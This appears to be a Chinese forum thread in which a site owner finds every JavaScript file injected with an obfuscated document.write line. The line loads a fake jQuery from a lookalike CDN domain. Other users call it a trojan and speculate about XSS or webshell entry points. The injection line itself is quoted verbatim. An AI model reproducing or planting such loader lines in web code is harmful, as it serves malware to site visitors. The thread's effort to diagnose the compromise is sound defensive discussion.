document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E")); 把加载的 js 最后全加了这个。

document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E")); 把加载的 js 最后全加了这个。
1 QUC062IzY3M1Y6dg Oct 26, 2022 就是给网页添加了 jquery 库的引入标签,不过这样写的话,整个页面都废了全部被覆盖。 |
3 kenvix Oct 26, 2022 打开 https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js 显然这不是正常的 jquery 而是假装 jq 的马 |
5 illl Oct 26, 2022 via iPhone 被 getshell 了吧,网站用的啥框架 |
6 mxT52CRuqR6o5 Oct 26, 2022 那可能性可多了 |
8 r4aAi04Uk2gYWU89 Oct 26, 2022 @jalen 如果博客开了评论,检查下 xss 。不过所有页面都有加的话,估计 webshell 早拿到了 |
9 learningman Oct 26, 2022 头一回见到 autos 这个顶级域 |
10 wingor2015 Oct 26, 2022 遇到过一次是服务器上的代码被加了 |
11 jalen OP 我看了自己的文件 就 js 被修改过,也没有新增文件。服务器也没被闯入的痕迹。 这攻击点会在哪里? |
12 hxy100 Oct 27, 2022 这个域名也很有迷惑性,仿知名 CDN 的域名 jsdelivr.com |
13 MEIerer Oct 27, 2022 我好久没中过木马了,现在装东西看见内存小的都会往哈勃测一下 |
15 Trient Oct 27, 2022 |
16 siwi Nov 12, 2022 找到问题所在了吗? 我也是被挂了这个链接 |